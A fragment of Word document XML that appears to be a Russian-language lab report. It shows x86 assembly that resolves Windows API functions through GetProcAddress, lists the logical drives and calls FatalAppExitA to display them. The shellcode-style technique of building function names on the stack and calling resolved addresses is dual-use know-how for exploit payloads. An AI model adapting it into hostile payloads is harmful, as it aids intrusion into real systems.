          <w:p w14:paraId="6452C34C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gramStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>;вызов</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> самой </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>getprocaddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>(адрес(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">это 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E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>), название искомой функции(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ecx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="561B3544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push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ecx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</w:p>
          <w:p w14:paraId="6CD758CD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push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</w:p>
          <w:p w14:paraId="1C76AE48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call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ebp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gramStart"/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;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> результат вернет в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E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>, в данном случае результатом будет адрес</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1008B2BC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</w:p>
          <w:p w14:paraId="38BDA113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sub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esp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>, 0</w:t>
            </w:r>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">40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</w:p>
          <w:p w14:paraId="5DD93A61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mov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E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU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esp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gramStart"/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;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> прост </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>опамять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под результат</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A18B54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</w:p>
          <w:p w14:paraId="5D6B0B87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 xml:space="preserve">; DWORD </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>GetLogicalDriveStringsA</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>( [</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">in] DWORD </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>nBufferLength</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">, [out] LPSTR </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>lpBuffer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> )</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6EA6172D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74D41115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   push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gramStart"/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;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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lpBuffer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>, тут ожидаем результат</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A036A9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push 0x40        </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  ;</w:t>
            </w:r>
            <w:proofErr w:type="gram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nBufferLength</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B5DB7C0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655F3017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call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 xml:space="preserve">           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FC4DF6A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0EBB9F0E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mov </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>esi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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ED1A2BE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xor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ecx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ecx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B5D37E0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223578F3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spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>parse_loop</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="786DBD51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   mov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al</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>byte</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> [</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>] ;сравниваем</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> по байтам</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2504D1BA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cmp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al</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>cl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gramStart"/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;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> младший байт в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и 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44EE8571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jnz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next_char</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D8214B9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5261BA6C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0A39AA70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    mov al, byte [</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 1</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>] ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="614C3F10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cmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> al, cl         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="451C2161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jz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parse_done</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63395489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296D04DB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    mov byte [</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">], 0x20 ;0x20 - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>пробел</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="56600D6A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3DEF7CC4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next_char:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27923C34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inc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esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="301C57EE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jmp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parse_loop</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A661269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</w:p>
          <w:p w14:paraId="48DD34E3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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>parse_done</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6942D422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43D11D3A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xor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 xml:space="preserve">        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485B2418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    mov al, 0x41      </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  ;</w:t>
            </w:r>
            <w:proofErr w:type="gram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 xml:space="preserve"> = 0x00000041</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B848761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push </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="564A8C33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push 0x74697845   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "Exit"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F15307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push 0x7070416C   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>lApp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="390AE67F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push 0x61746146   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "Fata"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72395D64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1DC0BB91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mov </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ecx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white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esp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  ;</w:t>
            </w:r>
            <w:proofErr w:type="gram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сохраняем</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>exc</w:t>
            </w:r>
            <w:proofErr w:type="spell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FatalAppExitA</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="05E8756F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41EDC8F0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gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>;  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>GetProcAddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>(EBX, ECX)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A428012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push </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ecx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4438070F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push </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ebx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> kernel32.dll</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3473A018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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    call </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ebp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white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рез</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> в eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52D183CC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4ABA0319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; VOID </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>FatalAppExitA</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">UINT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>uAction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">, LPCSTR </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>lpMessageText</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D15B5B0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 xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>xor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ecx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, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ecx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proofErr w:type="gramStart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>;</w:t>
            </w:r>
            <w:proofErr w:type="gram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>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>uAction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= 0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24E81873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</w:p>
          <w:p w14:paraId="76FEC2C0" w14:textId="77777777" w:rsidR="0018105F" w:rsidRPr="00E748AD" w:rsidRDefault="0018105F" w:rsidP="0018105F">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU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push</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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proofErr w:type="gramStart"/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>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> указатель на текст </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26822AD3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 </w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>push ecx          </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AB1A9DB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 xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CCE2228" w14:textId="77777777" w:rsidR="0018105F" w:rsidRPr="0018105F" w:rsidRDefault="0018105F" w:rsidP="0018105F">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>    call eax        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75873DF8" w14:textId="77777777" w:rsidR="00401C70" w:rsidRDefault="00401C70" w:rsidP="0018105F">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56B26908" w14:textId="77777777" w:rsidR="00401C70" w:rsidRPr="00656D19" w:rsidRDefault="00401C70" w:rsidP="00401C70">
      <w:pPr>
        <w:pStyle w:val="affff1"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00401C70" w:rsidRPr="00656D19" w:rsidSect="00F310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C532" w14:textId="77777777" w:rsidR="00FA64CA" w:rsidRPr="00D60F71" w:rsidRDefault="00FA64CA" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="af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C8141F2" w14:textId="77777777" w:rsidR="00FA64CA" w:rsidRPr="00D60F71" w:rsidRDefault="00FA64CA" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="af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55B6" w14:textId="77777777" w:rsidR="002B35BC" w:rsidRDefault="002B35BC">
    <w:pPr>
      <w:pStyle w:val="af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78E4EAE" w14:textId="5C237CF2" w:rsidR="002B35BC" w:rsidRPr="00C53ADA" w:rsidRDefault="002B35BC" w:rsidP="00C53ADA">
        <w:pPr>
          <w:pStyle w:val="aff6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9F6BFE">
          <w:rPr>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>15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9C37" w14:textId="77777777" w:rsidR="002B35BC" w:rsidRDefault="002B35BC">
    <w:pPr>
      <w:pStyle w:val="af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0C359" w14:textId="77777777" w:rsidR="00FA64CA" w:rsidRPr="00D60F71" w:rsidRDefault="00FA64CA" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="af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680B263" w14:textId="77777777" w:rsidR="00FA64CA" w:rsidRPr="00D60F71" w:rsidRDefault="00FA64CA" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="af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CAC9" w14:textId="77777777" w:rsidR="002B35BC" w:rsidRDefault="002B35BC">
    <w:pPr>
      <w:pStyle w:val="af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ED92" w14:textId="77777777" w:rsidR="002B35BC" w:rsidRDefault="002B35BC">
    <w:pPr>
      <w:pStyle w:val="af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8103" w14:textId="77777777" w:rsidR="002B35BC" w:rsidRDefault="002B35BC">
    <w:pPr>
      <w:pStyle w:val="af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D0E0A5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2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E800CC7C"/>
    <w:name w:val="WW8Num2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="a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8B068A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50C6293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133B690B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91D06C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2960020A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00ECD502"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a3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0" w:firstLine="709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CA781C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F9C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C204F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F7E80F12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8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980" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
